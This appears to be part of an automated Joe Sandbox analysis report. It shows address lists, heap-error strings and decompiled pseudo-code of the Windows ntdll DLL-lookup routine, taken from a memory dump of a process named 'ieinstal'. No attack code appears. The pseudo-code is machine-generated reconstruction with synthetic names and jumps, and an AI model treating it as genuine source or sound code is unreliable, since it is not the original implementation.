                                                                                                                0x1e7013aa
                                                                                                                0x1e7013ae
                                                                                                                0x1e7013cd
                                                                                                                0x1e7013d2
                                                                                                                0x1e7013b0
                                                                                                                0x1e7013c5
                                                                                                                0x1e7013ca
                                                                                                                0x1e7013e2
                                                                                                                0x1e7013e7
                                                                                                                0x1e7013e7
                                                                                                                0x1e7013e9
                                                                                                                0x1e7013f0
                                                                                                                0x1e7013f8
                                                                                                                0x1e7013f8
                                                                                                                0x1e7013fc
                                                                                                                0x1e701406
                                                                                                                0x1e70140c
                                                                                                                0x1e70140c
                                                                                                                0x1e70140c
                                                                                                                0x00000000
                                                                                                                0x1e7013fc
                                                                                                                0x1e700ecc
                                                                                                                0x1e700ecf
                                                                                                                0x1e700ed2
                                                                                                                0x1e700ed7
                                                                                                                0x1e700eda
                                                                                                                0x1e700edd
                                                                                                                0x1e700ee3
                                                                                                                0x1e700f58
                                                                                                                0x1e700f64
                                                                                                                0x1e700f66
                                                                                                                0x1e700f69
                                                                                                                0x1e701139
                                                                                                                0x1e70113c
                                                                                                                0x1e70113f
                                                                                                                0x1e701144
                                                                                                                0x1e701144
                                                                                                                0x1e701146
                                                                                                                0x1e701146
                                                                                                                0x1e70114b
                                                                                                                0x1e701165
                                                                                                                0x1e70114d
                                                                                                                0x1e70115d
                                                                                                                0x1e70115d
                                                                                                                0x1e701169
                                                                                                                0x1e701360
                                                                                                                0x1e701366
                                                                                                                0x1e70136a
                                                                                                                0x1e701389
                                                                                                                0x1e70138e
                                                                                                                0x1e70136c
                                                                                                                0x1e701381
                                                                                                                0x1e701386
                                                                                                                0x1e701398
                                                                                                                0x1e701399
                                                                                                                0x1e70139a
                                                                                                                0x00000000
                                                                                                                0x1e70116f
                                                                                                                0x1e701173
                                                                                                                0x1e7011fc
                                                                                                                0x1e701200
                                                                                                                0x1e70120a
                                                                                                                0x1e701210
                                                                                                                0x1e701210
                                                                                                                0x1e701210
                                                                                                                0x1e701212
                                                                                                                0x1e701212
                                                                                                                0x00000000
                                                                                                                0x1e701212
                                                                                                                0x1e701179
                                                                                                                0x1e70117e
                                                                                                                0x1e7012f4
                                                                                                                0x1e7012fa
                                                                                                                0x1e7012fd
                                                                                                                0x1e701341
                                                                                                                0x1e701345
                                                                                                                0x1e70134f
                                                                                                                0x1e701355
                                                                                                                0x1e701355
                                                                                                                0x1e701355
                                                                                                                0x00000000
                                                                                                                0x1e701345
                                                                                                                0x1e7012ff
                                                                                                                0x1e701305
                                                                                                                0x1e701309
                                                                                                                0x1e701328
                                                                                                                0x1e70132d
                                                                                                                0x1e70130b
                                                                                                                0x1e701320
                                                                                                                0x1e701325
                                                                                                                0x1e701333
                                                                                                                0x1e701336
                                                                                                                0x1e701337
                                                                                                                0x1e7012a0
                                                                                                                0x1e7012a0
                                                                                                                0x00000000
                                                                                                                0x1e7012a5
                                                                                                                0x1e701184
                                                                                                                0x1e70118a
                                                                                                                0x1e701191
                                                                                                                0x1e70119b
                                                                                                                0x1e7011a1
                                                                                                                0x1e7011a1
                                                                                                                0x1e7011a9
                                                                                                                0x1e7011ae
                                                                                                                0x1e7011f6
                                                                                                                0x1e7011f6
                                                                                                                0x00000000
                                                                                                                0x1e7011b0
                                                                                                                0x1e7011b4
                                                                                                                0x1e7011b9
                                                                                                                0x1e7011c3
                                                                                                                0x1e7011c6
                                                                                                                0x1e7011c8
                                                                                                                0x1e7011cb
                                                                                                                0x1e7011cd
                                                                                                                0x1e7011cd
                                                                                                                0x1e7011c6
                                                                                                                0x1e7011da
                                                                                                                0x1e7012ad
                                                                                                                0x1e7012b3
                                                                                                                0x1e7012b7
                                                                                                                0x1e7012d6
                                                                                                                0x1e7012db
                                                                                                                0x1e7012b9
                                                                                                                0x1e7012ce
                                                                                                                0x1e7012d3
                                                                                                                0x1e7012eb
                                                                                                                0x1e7012ec
                                                                                                                0x1e7012ed
                                                                                                                0x00000000
                                                                                                                0x1e7011e0
                                                                                                                0x1e7011e4
                                                                                                                0x1e7011ee
                                                                                                                0x1e7011f4
                                                                                                                0x1e7011f4
                                                                                                                0x00000000
                                                                                                                0x1e7011e4
                                                                                                                0x1e7011da
                                                                                                                0x1e7011ae
                                                                                                                0x1e701169
                                                                                                                0x1e700f72
                                                                                                                0x1e700f75
                                                                                                                0x1e700f78
                                                                                                                0x1e700f7b
                                                                                                                0x1e700f7d
                                                                                                                0x1e700f80
                                                                                                                0x1e700f82
                                                                                                                0x1e700f82
                                                                                                                0x1e700f85
                                                                                                                0x1e700f85
                                                                                                                0x1e700f80
                                                                                                                0x1e700f88
                                                                                                                0x1e700f8b
                                                                                                                0x1e701124
                                                                                                                0x1e701128
                                                                                                                0x1e70112d
                                                                                                                0x1e701130
                                                                                                                0x1e701133
                                                                                                                0x1e70125d
                                                                                                                0x1e701263
                                                                                                                0x1e701267
                                                                                                                0x1e701286
                                                                                                                0x1e70128b
                                                                                                                0x1e701269
                                                                                                                0x1e70127e
                                                                                                                0x1e701283
                                                                                                                0x1e701297
                                                                                                                0x1e701297
                                                                                                                0x1e701299
                                                                                                                0x1e70129a
                                                                                                                0x1e70129b
                                                                                                                0x00000000
                                                                                                                0x1e70129b
                                                                                                                0x00000000
                                                                                                                0x1e700f91
                                                                                                                0x1e700f91
                                                                                                                0x1e700f94
                                                                                                                0x1e700f97
                                                                                                                0x1e700f9a
                                                                                                                0x1e700f9d
                                                                                                                0x1e700fa0
                                                                                                                0x1e700fa2
                                                                                                                0x1e701106
                                                                                                                0x1e701106
                                                                                                                0x1e701108
                                                                                                                0x1e70110c
                                                                                                                0x1e70110d
                                                                                                                0x1e701113
                                                                                                                0x1e701114
                                                                                                                0x00000000
                                                                                                                0x1e701114
                                                                                                                0x1e700fa8
                                                                                                                0x1e700fab
                                                                                                                0x1e700fad
                                                                                                                0x1e700fb0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e700fb9
                                                                                                                0x1e700fbc
                                                                                                                0x1e700fc2
                                                                                                                0x1e700fc4
                                                                                                                0x1e700fec
                                                                                                                0x1e700fec
                                                                                                                0x1e700fef
                                                                                                                0x1e700ff1
                                                                                                                0x1e700ff4
                                                                                                                0x1e700ff8
                                                                                                                0x1e701021
                                                                                                                0x1e701021
                                                                                                                0x1e701024
                                                                                                                0x1e70102c
                                                                                                                0x1e70102f
                                                                                                                0x1e701032
                                                                                                                0x1e701035
                                                                                                                0x1e70103b
                                                                                                                0x1e701050
                                                                                                                0x1e70103d
                                                                                                                0x1e701046
                                                                                                                0x1e701048
                                                                                                                0x1e701048
                                                                                                                0x1e701052
                                                                                                                0x1e701054
                                                                                                                0x1e701087
                                                                                                                0x1e701087
                                                                                                                0x1e70108a
                                                                                                                0x1e70108c
                                                                                                                0x1e70109d
                                                                                                                0x1e70109f
                                                                                                                0x1e7010a1
                                                                                                                0x1e7010a3
                                                                                                                0x1e7010a5
                                                                                                                0x1e7010a8
                                                                                                                0x1e7010a9
                                                                                                                0x1e70108e
                                                                                                                0x1e70108e
                                                                                                                0x1e70108e
                                                                                                                0x1e701091
                                                                                                                0x1e701093
                                                                                                                0x1e701096
                                                                                                                0x1e701098
                                                                                                                0x1e701098
                                                                                                                0x1e7010b1
                                                                                                                0x1e7010b4
                                                                                                                0x1e7010ba
                                                                                                                0x1e7010bc
                                                                                                                0x1e7010e1
                                                                                                                0x1e7010e1
                                                                                                                0x1e7010e5
                                                                                                                0x1e7010f3
                                                                                                                0x1e7010f9
                                                                                                                0x1e7010f9
                                                                                                                0x00000000
                                                                                                                0x1e7010be
                                                                                                                0x1e7010be
                                                                                                                0x1e7010cb
                                                                                                                0x1e7010cb
                                                                                                                0x1e7010ce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e7010c3
                                                                                                                0x1e7010c5
                                                                                                                0x1e7010c7
                                                                                                                0x1e701103
                                                                                                                0x1e7010d2
                                                                                                                0x1e7010d4
                                                                                                                0x1e7010d7
                                                                                                                0x1e7010dc
                                                                                                                0x00000000
                                                                                                                0x1e7010dc
                                                                                                                0x1e7010c9
                                                                                                                0x1e7010c9
                                                                                                                0x1e7010d0
                                                                                                                0x00000000
                                                                                                                0x1e7010d0
                                                                                                                0x1e701056
                                                                                                                0x1e701056
                                                                                                                0x1e701059
                                                                                                                0x1e701059
                                                                                                                0x1e70105b
                                                                                                                0x1e70106f
                                                                                                                0x1e70105d
                                                                                                                0x1e70105d
                                                                                                                0x1e701060
                                                                                                                0x1e701063
                                                                                                                0x1e701065
                                                                                                                0x1e701067
                                                                                                                0x1e701067
                                                                                                                0x1e701067
                                                                                                                0x1e70106a
                                                                                                                0x1e70106a
                                                                                                                0x1e701076
                                                                                                                0x1e701079
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e70107b
                                                                                                                0x1e701083
                                                                                                                0x1e701085
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e701085
                                                                                                                0x00000000
                                                                                                                0x1e701059
                                                                                                                0x1e701054
                                                                                                                0x1e700ffe
                                                                                                                0x1e701003
                                                                                                                0x1e701005
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e70100f
                                                                                                                0x1e701011
                                                                                                                0x00000000
                                                                                                                0x1e701011
                                                                                                                0x1e700fc6
                                                                                                                0x1e700fd3
                                                                                                                0x1e700fd3
                                                                                                                0x1e700fd6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e700fcb
                                                                                                                0x1e700fcd
                                                                                                                0x1e700fcf
                                                                                                                0x1e70101e
                                                                                                                0x1e700fda
                                                                                                                0x1e700fdc
                                                                                                                0x1e700fe4
                                                                                                                0x1e700fe9
                                                                                                                0x00000000
                                                                                                                0x1e700fe9
                                                                                                                0x1e700fd1
                                                                                                                0x1e700fd1
                                                                                                                0x1e700fd8
                                                                                                                0x00000000
                                                                                                                0x1e700fd8
                                                                                                                0x1e700f8b
                                                                                                                0x1e700ee9
                                                                                                                0x1e700f38
                                                                                                                0x1e700f3c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e700f4d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e700eeb
                                                                                                                0x1e700eee
                                                                                                                0x1e700f00
                                                                                                                0x1e700ef0
                                                                                                                0x1e700ef2
                                                                                                                0x1e700ef7
                                                                                                                0x1e700efa
                                                                                                                0x1e700efa
                                                                                                                0x1e700f04
                                                                                                                0x1e700f07
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e700f09
                                                                                                                0x1e700f1f
                                                                                                                0x1e700f24
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e700f26
                                                                                                                0x1e700f2d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e700f2f
                                                                                                                0x1e700f32
                                                                                                                0x1e700f35
                                                                                                                0x1e700f35
                                                                                                                0x00000000
                                                                                                                0x1e700f35
                                                                                                                0x1e700f0b
                                                                                                                0x1e700f18
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e700f1a
                                                                                                                0x00000000
                                                                                                                0x1e700f1a
                                                                                                                0x1e701215
                                                                                                                0x1e701215
                                                                                                                0x1e70121e
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                • API String ID: 0-3591852110
                                                                                                                • Opcode ID: 97eb0503b36363aea85c8c1c1ab8b2b98b8a807f72ff67b996c80bcd00af86c3
                                                                                                                • Instruction ID: 8dac881fad6a5403e25a1afc3518ceadc229b57e7a30a2573172c08c4af4e624
                                                                                                                • Opcode Fuzzy Hash: 97eb0503b36363aea85c8c1c1ab8b2b98b8a807f72ff67b996c80bcd00af86c3
                                                                                                                • Instruction Fuzzy Hash: 3912DF30600682EFE715CF65D450BBABBF6FF0A314F548A59E4868B6A1D734E981CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E66AC20 Relevance: 11.8, Strings: 9, Instructions: 509COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E1E66AC20(signed int __ecx, signed char _a4, signed int _a8, intOrPtr _a16, signed char _a20) {
				signed int _v8;
				char _v276;
				void* _v280;
				void* _v284;
				void* _v304;
				void* _v308;
				void* _v312;
				void* _v324;
				short _v532;
				signed short* _v536;
				void* _v540;
				char _v544;
				void* _v548;
				void* _v576;
				signed int _v604;
				signed int _v608;
				signed int _v620;
				void* _v628;
				char _v632;
				char _v636;
				signed short _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed short _v656;
				signed short _v660;
				signed char _v664;
				signed char _v668;
				char _v669;
				void* _v672;
				signed int _v676;
				void* _v677;
				void* _v684;
				void* _v696;
				void* _v700;
				void* _v704;
				void* _v708;
				void* _v712;
				void* _v716;
				void* _v724;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t197;
				void* _t215;
				void* _t225;
				signed int _t250;
				char* _t255;
				signed char* _t258;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr* _t270;
				intOrPtr _t275;
				signed int _t276;
				intOrPtr _t283;
				intOrPtr _t295;
				signed short _t299;
				signed short _t300;
				intOrPtr _t307;
				signed char _t314;
				void* _t315;
				signed short* _t316;
				signed int _t317;
				signed int _t318;
				signed short _t340;
				signed short _t342;
				intOrPtr _t343;
				intOrPtr _t346;
				intOrPtr _t347;
				intOrPtr _t350;
				intOrPtr _t351;
				intOrPtr _t354;
				signed int _t356;
				signed int _t357;
				signed int _t362;
				void* _t363;
				signed char _t364;
				signed int _t366;
				unsigned int _t368;
				signed short* _t369;
				intOrPtr _t371;
				void* _t372;
				void* _t373;
				signed int _t374;
				signed int _t376;
				signed int _t378;
				signed int _t379;

				_t319 = __ecx;
				_t378 = (_t376 & 0xfffffff8) - 0x2a4;
				_v8 =  *0x1e74b370 ^ _t378;
				_t371 = _a16;
				_v668 = _a20;
				if(( *0x1e7437c0 & 0x00000009) != 0) {
					E1E6CE692("minkernel\\ntdll\\ldrapi.c", 0x34c, "LdrGetDllHandleEx", 3, "DLL name: %wZ\n", _t371);
					_t378 = _t378 + 0x18;
				}
				_t362 =  *(_t371 + 4);
				E1E698F40( &_v620, 0, 0x50);
				_t197 = _a8;
				_t379 = _t378 + 0xc;
				if((_t197 & 0x00000001) == 0 && _t197 != 0) {
					_v620 = _t197;
					if(( *0x1e7437c0 & 0x00000005) != 0) {
						E1E6CE692("minkernel\\ntdll\\ldrutil.c", 0x5a5, "LdrpInitializeDllPath", 2, "DLL search path passed in externally: %ws\n", _t197);
						_t379 = _t379 + 0x18;
					}
					_t355 = _t362;
					E1E6CFF03(_t362, _v620, 0x14c0);
				} else {
					_v604 = _t362;
					_v608 = _t197 & 0xfffffffe;
				}
				_t314 = _a4;
				if((_t314 & 0xfffffff8) != 0) {
					_t372 = 0xc000000d;
					L57:
					if(_v544 != 0) {
						E1E67E7E0(_t319, _v620);
					}
					if(( *0x1e7437c0 & 0x00000009) != 0) {
						E1E6CE692("minkernel\\ntdll\\ldrapi.c", 0x37e, "LdrGetDllHandleEx", 4, "Status: 0x%08lx\n", _t372);
						_t379 = _t379 + 0x18;
					}
					_pop(_t363);
					_pop(_t373);
					_pop(_t315);
					return E1E694B50(_t372, _t315, _v8 ^ _t379, _t355, _t363, _t373);
				}
				if((_t314 & 0x00000003) == 3) {
					_t372 = 0xc000000d;
					goto L57;
				}
				_t364 = _v668;
				if(_t364 == 0) {
					if((_t314 & 0x00000002) != 0) {
						goto L7;
					}
					_t372 = 0xc000000d;
					goto L57;
				}
				L7:
				if(E1E66C4A0(0,  &_v636) < 0) {
					_v669 = 0;
				} else {
					_v669 = 1;
				}
				_v664 = 0;
				_v536 =  &_v532;
				_t355 =  &_v540;
				_v676 = 0;
				_v532 = 0;
				_v540 = 0x1000000;
				_t372 = E1E66B0D0(_t371,  &_v540, 0,  &_v664);
				if(_t372 < 0) {
					L38:
					_t211 = _v536;
					_t319 =  &_v532;
					if( &_v532 != _v536) {
						E1E64BA80(_t211);
					}
					_v540 = 0x1000000;
					_v536 =  &_v532;
					_v532 = 0;
					if(_v669 != 0) {
						E1E66C4A0(_v636,  &_v636);
					}
					if(_t372 < 0) {
						goto L57;
					} else {
						if((_t314 & 0x00000002) != 0) {
							_t215 = E1E687DF6(_v676);
							L115:
							_t372 = _t215;
							L44:
							if(_t372 >= 0 && _t364 != 0) {
								 *_t364 =  *((intOrPtr*)(_v676 + 0x18));
							}
							_t319 = _v676;
							E1E66D3E1(_t314, _v676, _t372);
							goto L57;
						}
						if((_t314 & 0x00000001) == 0) {
							_t215 = E1E66F602(_v676, _t355);
							goto L115;
						}
						goto L44;
					}
				} else {
					_t221 = _v664;
					if((_t221 & 0x00000020) == 0) {
						_t366 = _t221 & 0x00000200;
						if(_t366 == 0) {
							L69:
							_v276 = 0x1000000;
							 *((intOrPtr*)(_t379 + 0x1a4)) = _t379 + 0x1a8;
							 *((short*)(_t379 + 0x1a8)) = 0;
							_v648 = 0;
							_v644 = 0;
							if(_t366 == 0) {
								_t355 =  &_v620;
								_t225 = E1E672480( &_v540,  &_v620, 0, 0,  &_v276,  &_v632,  &_v648, 0, 0);
							} else {
								_t355 =  &_v276;
								_t225 = E1E671F5E( &_v540,  &_v276,  &_v632,  &_v648, _t221);
							}
							_t372 = _t225;
							if(_t372 >= 0) {
								_t355 =  &_v648;
								_t372 = E1E66F380( &_v632,  &_v648, _v664,  &_v676,  &_v660);
								if(_t372 == 0xc0000135) {
									_t355 =  &_v676;
									_t372 = E1E685751( &_v276,  &_v676,  &_v660);
								}
							}
							E1E67E3C9( &_v648);
							_t227 =  *((intOrPtr*)(_t379 + 0x1a4));
							if(_t379 + 0x1a8 !=  *((intOrPtr*)(_t379 + 0x1a4))) {
								E1E64BA80(_t227);
							}
							_v276 = 0x1000000;
							 *((intOrPtr*)(_t379 + 0x1a4)) = _t379 + 0x1a8;
							 *((short*)(_t379 + 0x1a8)) = 0;
							L34:
							if(( *0x1e7437c0 & 0x00000009) != 0) {
								E1E6CE692("minkernel\\ntdll\\ldrfind.c", 0x1e0, "LdrpFindLoadedDllInternal", 4, "Status: 0x%08lx\n", _t372);
								_t379 = _t379 + 0x18;
							}
							if(_t372 >= 0 && _v660 < 6 && ( *( *[fs:0x18] + 0xfca) & 0x00001000) == 0) {
								E1E66D3E1(_t314, _v676, _t372);
								_v676 = 0;
								E1E6719DF(0);
								_t355 =  &_v620;
								_t372 = E1E689E13( &_v540,  &_v620,  &_v676,  &_v660, _v664);
								E1E6879F9();
								if(_t372 >= 0 && _v652 != 9) {
									E1E66D3E1(_t314, _v668, _t372);
									_v668 = 0;
									_t372 = 0xc0000135;
								}
							}
							_t364 = _v668;
							goto L38;
						}
						_t355 =  &_v540;
						_t372 = E1E66F380(0,  &_v540, _t221,  &_v676,  &_v660);
						if(_t372 >= 0) {
							goto L34;
						}
						_t221 = _v664;
						goto L69;
					}
					_t374 = 0;
					_t368 = (_v540 & 0x0000ffff) >> 1;
					_t316 = _v536;
					if(_t368 == 0) {
						L16:
						if(_t374 == 0) {
							_t374 = 0x80000000;
						}
						L1E662330(_t221, 0x1e746668);
						_t250 = _t374 & 0x0000001f;
						_t340 =  *(0x1e745b80 + _t250 * 8);
						_t355 = 0x1e745b80 + _t250 * 8;
						_v656 = _t355;
						_v660 = _t340;
						if(_t340 == _t355) {
							L61:
							_t372 = 0xc0000135;
							goto L30;
						} else {
							_t267 = _t355;
							do {
								_t355 = _t340 - 0x3c;
								_v648 = _t355;
								if(_t374 !=  *((intOrPtr*)(_t355 + 0x90))) {
									goto L60;
								}
								if((_v664 & 0x00000008) != 0) {
									if(( *(_t355 + 0x34) & 0x00000001) == 0) {
										goto L60;
									}
								}
								if(( *(_t355 + 0x34) & 0x10000000) != 0) {
									goto L60;
								}
								_t317 = _v540 & 0x0000ffff;
								if(_t317 != ( *(_t355 + 0x2c) & 0x0000ffff)) {
									L98:
									_t267 = _v652;
									goto L60;
								}
								_t369 = _v536;
								_t269 = _t369 + _t317;
								_v632 = _t269;
								if(_t369 >= _t269) {
									L28:
									_t270 =  *((intOrPtr*)(_t355 + 0x50));
									if( *((intOrPtr*)(_t270 + 0xc)) != 0xffffffff) {
										if(( *( *_t270 - 0x20) & 0x00000020) == 0) {
											asm("lock inc dword [edx+0x9c]");
										}
									}
									_t372 = 0;
									_v676 = _t355;
									_v660 =  *( *((intOrPtr*)(_t355 + 0x50)) + 0x20);
									L30:
									E1E6624D0(0x1e746668);
									if(E1E663C40() != 0) {
										_t255 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
									} else {
										_t255 = 0x7ffe0384;
									}
									if( *_t255 != 0) {
										if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
											if(E1E663C40() == 0) {
												_t258 = 0x7ffe0385;
											} else {
												_t258 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
											}
											if(( *_t258 & 0x00000020) != 0) {
												_t355 = 0;
												E1E6D0227(0x14a0, 0, 0, ( &_v540 & 0xffffff00 | _t372 > 0x00000000) - 0x00000001 & 3,  &_v540, 0);
											}
										}
									}
									_t314 = _a4;
									goto L34;
								} else {
									_t275 =  *((intOrPtr*)(_t355 + 0x30)) - _t369;
									 *((intOrPtr*)(_t379 + 0x44)) = _t275;
									do {
										_t342 =  *(_t275 + _t369) & 0x0000ffff;
										_t318 =  *_t369 & 0x0000ffff;
										_v640 = _t342;
										if(_t318 != _t342) {
											if(_t318 < 0x61) {
												L52:
												if(_t342 >= 0x61) {
													if(_t342 > 0x7a) {
														if( *0x1e746914 == 0 || _t342 < 0xc0) {
															goto L53;
														} else {
															_t356 = _t342 & 0x0000ffff;
															_t343 =  *0x1e746914; // 0x7f090654
															_t355 = _t356 & 0x0000000f;
															_t283 =  *0x1e746914; // 0x7f090654
															_t346 =  *0x1e746914; // 0x7f090654
															_t276 =  *((intOrPtr*)(_t346 + (( *(_t283 + (( *(_t343 + (_t356 >> 8) * 2) & 0x0000ffff) + (_t356 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t356 & 0x0000000f)) * 2)) + _v640 & 0x0000ffff;
															L54:
															if(_t318 != _t276) {
																_t340 = _v656;
																goto L98;
															}
															_t275 =  *((intOrPtr*)(_t379 + 0x44));
															goto L26;
														}
													}
													_t276 = _t342 - 0x00000020 & 0x0000ffff;
													goto L54;
												}
												L53:
												_t276 = _t342 & 0x0000ffff;
												goto L54;
											}
											if(_t318 > 0x7a) {
												if( *0x1e746914 != 0 && _t318 >= 0xc0) {
													_t347 =  *0x1e746914; // 0x7f090654
													_t357 = _t318;
													_t355 = _t357 & 0x0000000f;
													_t295 =  *0x1e746914; // 0x7f090654
													_t350 =  *0x1e746914; // 0x7f090654
													_t342 = _v640;
													_t299 =  *((intOrPtr*)(_t350 + (( *(_t295 + (( *(_t347 + (_t318 >> 8) * 2) & 0x0000ffff) + (_t357 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t357 & 0x0000000f)) * 2)) + _t318;
													L51:
													_t318 = _t299 & 0x0000ffff;
												}
												goto L52;
											}
											_t88 = _t318 - 0x20; // 0xffffe0
											_t299 = _t88;
											goto L51;
										}
										L26:
										_t369 =  &(_t369[1]);
									} while (_t369 < _v632);
									_t355 = _v648;
									goto L28;
								}
								L60:
								_t340 =  *_t340;
								_v656 = _t340;
							} while (_t340 != _t267);
							goto L61;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t300 =  *_t316 & 0x0000ffff;
						_t316 =  &(_t316[1]);
						_t368 = _t368 - 1;
						_v656 = _t300;
						if(_t300 >= 0x61) {
							if(_t300 > 0x7a) {
								_t351 =  *0x1e746914; // 0x7f090654
								if(_t351 != 0 && _t300 >= 0xc0) {
									_t359 = _t300 & 0x0000ffff;
									_t307 =  *0x1e746914; // 0x7f090654
									_t354 =  *0x1e746914; // 0x7f090654
									_t300 =  *((intOrPtr*)(_t354 + (( *(_t307 + (( *(_t351 + ((_t300 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + ((_t300 & 0x0000ffff) >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t359 & 0x0000000f)) * 2)) + _v656;
								}
							} else {
								_t300 = _t300 + 0xffffffe0;
							}
						}
						_t221 = _t300 & 0xffff;
						_t374 = _t374 * 0x1003f + (_t300 & 0xffff);
					} while (_t368 != 0);
					goto L16;
				}
			}



























































































                                                                                                                0x1e66ac20
                                                                                                                0x1e66ac28
                                                                                                                0x1e66ac35
                                                                                                                0x1e66ac48
                                                                                                                0x1e66ac4c
                                                                                                                0x1e66ac50
                                                                                                                0x1e6b7e98
                                                                                                                0x1e6b7e9d
                                                                                                                0x1e6b7e9d
                                                                                                                0x1e66ac56
                                                                                                                0x1e66ac62
                                                                                                                0x1e66ac67
                                                                                                                0x1e66ac6a
                                                                                                                0x1e66ac6f
                                                                                                                0x1e6b7eac
                                                                                                                0x1e6b7eb0
                                                                                                                0x1e6b7ec9
                                                                                                                0x1e6b7ece
                                                                                                                0x1e6b7ece
                                                                                                                0x1e6b7eda
                                                                                                                0x1e6b7edc
                                                                                                                0x1e66ac79
                                                                                                                0x1e66ac7c
                                                                                                                0x1e66ac80
                                                                                                                0x1e66ac80
                                                                                                                0x1e66ac84
                                                                                                                0x1e66ac8d
                                                                                                                0x1e6b7ee6
                                                                                                                0x1e66af39
                                                                                                                0x1e66af41
                                                                                                                0x1e6b81ad
                                                                                                                0x1e6b81ad
                                                                                                                0x1e66af4e
                                                                                                                0x1e6b81ce
                                                                                                                0x1e6b81d3
                                                                                                                0x1e6b81d3
                                                                                                                0x1e66af5d
                                                                                                                0x1e66af5e
                                                                                                                0x1e66af5f
                                                                                                                0x1e66af6a
                                                                                                                0x1e66af6a
                                                                                                                0x1e66ac9a
                                                                                                                0x1e66af34
                                                                                                                0x00000000
                                                                                                                0x1e66af34
                                                                                                                0x1e66aca0
                                                                                                                0x1e66aca6
                                                                                                                0x1e6b7ef3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b7ef9
                                                                                                                0x00000000
                                                                                                                0x1e6b7ef9
                                                                                                                0x1e66acac
                                                                                                                0x1e66acba
                                                                                                                0x1e6b7f03
                                                                                                                0x1e66acc0
                                                                                                                0x1e66acc0
                                                                                                                0x1e66acc0
                                                                                                                0x1e66accc
                                                                                                                0x1e66acd4
                                                                                                                0x1e66acdb
                                                                                                                0x1e66ace4
                                                                                                                0x1e66acec
                                                                                                                0x1e66acfa
                                                                                                                0x1e66ad0d
                                                                                                                0x1e66ad11
                                                                                                                0x1e66ae86
                                                                                                                0x1e66ae86
                                                                                                                0x1e66ae8d
                                                                                                                0x1e66ae96
                                                                                                                0x1e6b8184
                                                                                                                0x1e6b8184
                                                                                                                0x1e66aea3
                                                                                                                0x1e66aeae
                                                                                                                0x1e66aeb7
                                                                                                                0x1e66aec3
                                                                                                                0x1e66aece
                                                                                                                0x1e66aece
                                                                                                                0x1e66aed5
                                                                                                                0x00000000
                                                                                                                0x1e66aed7
                                                                                                                0x1e66aeda
                                                                                                                0x1e6b8192
                                                                                                                0x1e6b81a2
                                                                                                                0x1e6b81a2
                                                                                                                0x1e66aee9
                                                                                                                0x1e66aeeb
                                                                                                                0x1e66aef8
                                                                                                                0x1e66aef8
                                                                                                                0x1e66aefa
                                                                                                                0x1e66aefe
                                                                                                                0x00000000
                                                                                                                0x1e66aefe
                                                                                                                0x1e66aee3
                                                                                                                0x1e6b819d
                                                                                                                0x00000000
                                                                                                                0x1e6b819d
                                                                                                                0x00000000
                                                                                                                0x1e66aee3
                                                                                                                0x1e66ad17
                                                                                                                0x1e66ad17
                                                                                                                0x1e66ad1d
                                                                                                                0x1e66afb4
                                                                                                                0x1e66afba
                                                                                                                0x1e66afe3
                                                                                                                0x1e66afea
                                                                                                                0x1e66aff5
                                                                                                                0x1e66affe
                                                                                                                0x1e66b006
                                                                                                                0x1e66b00a
                                                                                                                0x1e66b017
                                                                                                                0x1e6b80ce
                                                                                                                0x1e6b80d2
                                                                                                                0x1e66b01d
                                                                                                                0x1e66b028
                                                                                                                0x1e66b02f
                                                                                                                0x1e66b02f
                                                                                                                0x1e66b034
                                                                                                                0x1e66b038
                                                                                                                0x1e66b048
                                                                                                                0x1e66b055
                                                                                                                0x1e66b05d
                                                                                                                0x1e66b064
                                                                                                                0x1e66b074
                                                                                                                0x1e66b074
                                                                                                                0x1e66b05d
                                                                                                                0x1e66b07a
                                                                                                                0x1e66b07f
                                                                                                                0x1e66b08f
                                                                                                                0x1e66b0ba
                                                                                                                0x1e66b0ba
                                                                                                                0x1e66b098
